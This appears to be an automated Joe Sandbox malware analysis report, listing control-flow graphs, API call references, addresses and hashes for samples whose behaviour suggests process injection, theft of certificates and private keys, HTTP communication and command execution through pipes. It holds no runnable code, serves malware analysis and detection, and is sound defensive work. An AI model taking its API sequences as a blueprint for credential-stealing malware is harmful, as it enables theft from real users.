                                                                                                                            control_flow_graph 547 4019c0-4019c6 548 4019e7-401a10 547->548 549 4019c8-4019dd call 40127e 547->549 557 401a13-401a46 call 40127e Sleep call 4014fb 548->557 558 401a09-401a0c 548->558 566 401a55-401a5b 557->566 567 401a48-401a50 call 4015fb 557->567 558->557 570 401a60-401a65 566->570 571 401a69 566->571 567->566 572 401a6c-401a9a call 40127e 570->572 571->570 571->572
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 4123eb2909a1ca54cf4c12ed559c674bae09e9b4b475d8bbd2d0155f979259f4
                                                                                                                            • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                                                                                            • Opcode Fuzzy Hash: 4123eb2909a1ca54cf4c12ed559c674bae09e9b4b475d8bbd2d0155f979259f4
                                                                                                                            • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                            • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                                                                                            • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                            • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                            • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                                                                                            • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                            • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                            • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                                                                                            • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                            • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                            • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                                                                                            • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                            • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0074691A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmp, Offset: 00743000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_743000_uegasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction ID: 27542dcbb6764b9920c0da2e39f018dd53a69f0775907283ddb108739708e2ff
                                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction Fuzzy Hash: 51113C79A00208EFDB01DF98C985E98BBF5EF08351F158094FA489B362D775EA50DF81
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                                            • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                                                                                            • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                                            • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                            • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                                                                                            • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                            • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B
                                                                                                                            APIs
                                                                                                                            • LocalAlloc.KERNELBASE(00000000,004F23DC,00415CD5), ref: 00415658
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLocal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3494564517-0
                                                                                                                            • Opcode ID: 137ac3f92e9acb2c5fa584936085e74bc0c1da4fc1e5443efff9116a182976be
                                                                                                                            • Instruction ID: 5e48a04f9e11dcc7131419058854abdc843f7e17987eb29baea089ef08641d0b
                                                                                                                            • Opcode Fuzzy Hash: 137ac3f92e9acb2c5fa584936085e74bc0c1da4fc1e5443efff9116a182976be
                                                                                                                            • Instruction Fuzzy Hash: 79B092B05421009FE200CB60AE04B203AA8E308202F018461B904C21A0D6B14410CA28
                                                                                                                            APIs
                                                                                                                            • BuildCommDCBW.KERNEL32(00000000,?), ref: 0041587D
                                                                                                                            • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004158C1
                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004158D2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCalendarCommInfoNamePathShort
                                                                                                                            • String ID: -
                                                                                                                            • API String ID: 1570861727-2547889144
                                                                                                                            • Opcode ID: bc17eb0377387f5bad20137c454eddc6c6d7c052231a44a3ecaa76dbaeee760d
                                                                                                                            • Instruction ID: 75a0542c090a1048562518fe0c410909b3098a1f030c9eacbf9327c34c692846
                                                                                                                            • Opcode Fuzzy Hash: bc17eb0377387f5bad20137c454eddc6c6d7c052231a44a3ecaa76dbaeee760d
                                                                                                                            • Instruction Fuzzy Hash: 3A11C630940204DAD760EF64DC81BED7BF4FB48310F5181B9E588AA1C0CE745AD98B99
                                                                                                                            APIs
                                                                                                                            • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00415944
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041595F
                                                                                                                            • HeapDestroy.KERNEL32(00000000), ref: 0041597E
                                                                                                                            • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415986
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 367530164-0
                                                                                                                            • Opcode ID: 97ff363394a7b784a3dec45dcbe4e62a596ef6cbb787102fc82400f029e94037
                                                                                                                            • Instruction ID: c5ece5b07aa489753bf58a5f8e8b67b970329aa906d251dcea3a70d9a670a326
                                                                                                                            • Opcode Fuzzy Hash: 97ff363394a7b784a3dec45dcbe4e62a596ef6cbb787102fc82400f029e94037
                                                                                                                            • Instruction Fuzzy Hash: BE01DBB0650108DFD710EB64ED457EA37A8E70C316F414436F609D7291DAB45D94CF5E

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:23.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:4.6%
                                                                                                                            Total number of Nodes:857
                                                                                                                            Total number of Limit Nodes:31
execution_graph (rendered graph data omitted; the node/edge dump listed only internal node identifiers and function addresses in the 0x7ff7cbca1000-0x7ff7cbcaf000 range). API calls named in the graph nodes, in order of appearance: GetProcessHeap, HeapAlloc, RtlReAllocateHeap, RtlFreeHeap, wvsprintfW, SCardListCardsW, SCardGetStatusChangeW, SCardFreeMemory, CertOpenStore, CertEnumCertificatesInStore, CertCloseStore, CertGetNameStringW, CertNameToStrW, FileTimeToSystemTime, CertGetCertificateContextProperty, CryptAcquireCertificatePrivateKey, CryptGetUserKey, OpenSCManagerA, LoadLibraryA, GetProcAddress, VirtualProtect, CertAddCertificateLinkToStore, CertSetCertificateContextProperty, PFXExportCertStoreEx, CryptExportKey, CryptAcquireContextA, CryptImportKey, lstrcpyW, PathAppendW, RegGetValueW, CertEnumSystemStore, RemoveVectoredExceptionHandler, CreatePipe, GetLastError, CreateProcessW, CloseHandle, WaitForSingleObject, PeekNamedPipe, GetExitCodeProcess, TerminateProcess, GetSystemTimeAsFileTime, ReadFile, WriteFile, WinHttpOpen, WinHttpCrackUrl, WinHttpConnect, WinHttpOpenRequest, WinHttpQueryOption, WinHttpSetOption, WinHttpSendRequest, WinHttpReceiveResponse, WinHttpQueryDataAvailable, WinHttpReadData, WinHttpCloseHandle, SysAllocString, SafeArrayCreateVector, SafeArrayAccessData, SafeArrayUnaccessData, SysFreeString, RegCreateKeyExA, CoInitializeEx, VariantInit, CoCreateInstance, RegSetValueExA, RegCloseKey, RegOpenKeyExW, RegEnumKeyExW, PathCombineW, PathFileExistsW, PathQuoteSpacesW, lstrcatW, GetEnvironmentVariableW, CreateFileW, GetFileSize, CertEnumSystemStoreLocation, GetNativeSystemInfo, CoInitializeSecurity, GetCurrentProcess, IsWow64Process, CoUninitialize.

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: Initialize$CreateInstanceSecurity
• String ID:
• API String ID: 89549506-0
• Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
• Instruction ID: 29fb2367b9cdde2808705716e87e1773e5cf23658b3fe62767f5f4b70631e0dc
• Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
• Instruction Fuzzy Hash: 5D118C73A24640CAF3209F61E8593AE7774F34870DF608218EB491A958CF3CD245CB94

Control-flow Graph

APIs
• GetProcessHeap.KERNEL32(?,?,?,00007FF7CBCA1951,?,?,00000000,00007FF7CBCA19BA), ref: 00007FF7CBCA2669
• RtlReAllocateHeap.NTDLL(?,?,?,00007FF7CBCA1951,?,?,00000000,00007FF7CBCA19BA), ref: 00007FF7CBCA267A
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
• Instruction ID: c157f1cc4890f256802a5b5615d5210543fd8802ee67f6507f9beb974e2fed63
• Opcode Fuzzy Hash: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
• Instruction Fuzzy Hash: 79E08615A195A281E928AF9AB954079A135AF48FE0F888430FF0E0B775CE2CD5414610

Control-flow Graph

APIs
• CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7CBCA2D90
• CertGetNameStringW.CRYPT32 ref: 00007FF7CBCA2DD3
• CertNameToStrW.CRYPT32 ref: 00007FF7CBCA2EB8
• CertNameToStrW.CRYPT32 ref: 00007FF7CBCA2F0A
• FileTimeToSystemTime.KERNEL32 ref: 00007FF7CBCA2F4B
• FileTimeToSystemTime.KERNEL32 ref: 00007FF7CBCA2FC1
  • Part of subcall function 00007FF7CBCA1A70: wvsprintfW.USER32 ref: 00007FF7CBCA1AA9
  • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
  • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
• CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7CBCA3178
  • Part of subcall function 00007FF7CBCA3220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA325E
  • Part of subcall function 00007FF7CBCA3220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7CBCA328D
  • Part of subcall function 00007FF7CBCA3220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA32BB
  • Part of subcall function 00007FF7CBCA3220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3336
  • Part of subcall function 00007FF7CBCA3220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3380
  • Part of subcall function 00007FF7CBCA3220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA33AC
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
• String ID: 1.2.840.113549
• API String ID: 2787208766-3888290641
• Opcode ID: 54ac73e7e283cc655eb01142bb5e8eae3fe0ba445d2b642dac4cf7936e5552d7
• Instruction ID: c9aa2769a68da4bdf34d406fa0729a2bf928d94c85eb105ea93ef6a4eb9bd55f
• Opcode Fuzzy Hash: 54ac73e7e283cc655eb01142bb5e8eae3fe0ba445d2b642dac4cf7936e5552d7
• Instruction Fuzzy Hash: 14B18F62A1866285EB60AF6AD4512BEA761FB85BD4F800431EF9D07B69DF3CD104CB60

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: CreateErrorLast$Pipe$CloseHandleProcess
• String ID:
• API String ID: 2620922840-0
• Opcode ID: 2bf46aedc423b534a393a5c4b1443350d03c6c4fe38568a13f8f064401dd7188
• Instruction ID: 78e4cbc5e639e9c6d41149b44979b19229e93d5b01c940fd0eddf9693a211396
• Opcode Fuzzy Hash: 2bf46aedc423b534a393a5c4b1443350d03c6c4fe38568a13f8f064401dd7188
• Instruction Fuzzy Hash: 04518432B18A518AEB20EFB5D4843ED73A1AB58798F800435EF0D9BA69DF7CD109C350

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 129 7ff7cbca9224-7ff7cbca9306 GetSystemTimeAsFileTime call 7ff7cbca9a20 * 3 call 7ff7cbca9a98 call 7ff7cbca2698 call 7ff7cbca25dc call 7ff7cbca7b34 * 4 call 7ff7cbca971c call 7ff7cbca25b4 154 7ff7cbca9309-7ff7cbca9317 129->154 155 7ff7cbca9329-7ff7cbca9330 154->155 156 7ff7cbca9319-7ff7cbca931c call 7ff7cbca968c 154->156 158 7ff7cbca9332-7ff7cbca9335 155->158 159 7ff7cbca938c-7ff7cbca9393 155->159 162 7ff7cbca9321-7ff7cbca9323 156->162 158->159 163 7ff7cbca9337-7ff7cbca9351 158->163 160 7ff7cbca93a2-7ff7cbca93b6 WaitForSingleObject 159->160 161 7ff7cbca9395-7ff7cbca9399 call 7ff7cbca968c 159->161 165 7ff7cbca93f5 160->165 166 7ff7cbca93b8-7ff7cbca93ca GetSystemTimeAsFileTime 160->166 169 7ff7cbca939e-7ff7cbca93a0 161->169 162->155 162->165 167 7ff7cbca9382-7ff7cbca9386 163->167 168 7ff7cbca9353-7ff7cbca9365 call 7ff7cbca7b50 163->168 171 7ff7cbca93f7-7ff7cbca9417 165->171 166->154 170 7ff7cbca93d0-7ff7cbca93e3 call 7ff7cbca9a98 166->170 167->159 173 7ff7cbca9418-7ff7cbca942c WaitForSingleObject 167->173 178 7ff7cbca9374-7ff7cbca9380 168->178 179 7ff7cbca9367-7ff7cbca936e 168->179 169->160 169->165 170->154 184 7ff7cbca93e9-7ff7cbca93ef TerminateProcess 170->184 173->165 176 7ff7cbca942e-7ff7cbca9434 173->176 180 7ff7cbca9442-7ff7cbca9449 176->180 181 7ff7cbca9436-7ff7cbca9439 call 7ff7cbca968c 176->181 178->167 178->168 179->173 179->178 182 7ff7cbca9458-7ff7cbca9468 GetExitCodeProcess 180->182 183 7ff7cbca944b-7ff7cbca944f call 7ff7cbca968c 180->183 189 7ff7cbca943e-7ff7cbca9440 181->189 187 7ff7cbca9473-7ff7cbca9475 182->187 188 7ff7cbca946a-7ff7cbca9471 182->188 190 7ff7cbca9454-7ff7cbca9456 183->190 184->165 187->171 188->165 188->187 189->165 189->180 190->165 190->182
APIs
• GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CBCA924D
  • Part of subcall function 00007FF7CBCA25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CBCA1985,?,?,?,00007FF7CBCA155F), ref: 00007FF7CBCA25E5
  • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
  • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
• WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CBCA93AB
• GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CBCA93C0
• TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CBCA93EF
  • Part of subcall function 00007FF7CBCA968C: PeekNamedPipe.KERNELBASE ref: 00007FF7CBCA96B8
• WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CBCA9421
• GetExitCodeProcess.KERNELBASE ref: 00007FF7CBCA9460
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
• String ID: & echo
• API String ID: 2711250446-3491486023
• Opcode ID: 9501a8b6e56cac107a441458360dc59c43fe8e9a05d9c4e06a1eb98c650668d3
• Instruction ID: 3bec1a7aa0a13fcccb6b20944d3da7c00b11a4a17fb4a74cf147a75b846bf357
• Opcode Fuzzy Hash: 9501a8b6e56cac107a441458360dc59c43fe8e9a05d9c4e06a1eb98c650668d3
• Instruction Fuzzy Hash: 47515425B1965281EE30FF1AE5552BAE361FF84BA0F844831EF4E47AA5DE7CE445C320

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: Cert$NameStore$CertificatesCloseEnumOpenString
• String ID: +ss$+sls$fs{s${s{s
• API String ID: 3617724111-3691527440
• Opcode ID: 041190dec486dc00a696f8e4274d1a1c3cacc9eb9b54fbdfd046d7e1b3a2024b
